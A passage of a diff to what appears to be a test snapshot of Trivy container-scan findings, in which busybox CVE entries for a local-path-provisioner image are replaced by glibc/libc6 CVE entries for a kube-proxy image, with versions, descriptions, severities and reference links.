"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + }, + { + "type": "URL", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42382", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42382", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "category": "Vulnerability", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42382", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42382", - }, - { - "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42383", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42383", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-42383", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42383", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42383", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42383", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42384", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42384", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42384", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42384", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42384", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42385", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42385", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42385", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42385", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42385", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5768-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42386", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42386", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42386", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42386", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42386", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r22", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-28391", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28391", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", - "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", - "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", - "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", - "https://www.cve.org/CVERecord?id=CVE-2022-28391", - ], - }, - "category": "Vulnerability", - "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: remote attackers may execute arbitrary code if netstat is used", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28391", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28391", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42374", - "installedVersion": "1.31.1-r16", - "packageName": "busybox", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": 